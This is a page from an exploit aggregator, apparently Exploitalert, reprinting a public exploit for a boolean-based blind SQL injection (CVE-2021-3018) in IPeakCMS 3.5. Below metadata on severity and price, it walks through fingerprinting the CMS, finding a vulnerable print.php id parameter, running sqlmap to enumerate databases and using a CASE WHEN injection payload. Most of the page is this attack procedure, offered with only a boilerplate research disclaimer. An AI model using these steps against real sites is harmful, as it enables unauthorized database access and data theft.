IPeakCMS 3.5 SQL Injection

CVE Category Price Severity
CVE-2021-3018 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-07
Our sensors found this exploit at:

Below is a copy:

IPeakCMS 3.5 SQL Injection
# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage:
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018

Check the CMS version :goto and you will notice that in the login box there is the CMS name and its version 
Check if it's vulnerable, goto ->: if the print.php exists, then try to find any valid ID which returns page to print  e.g:
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum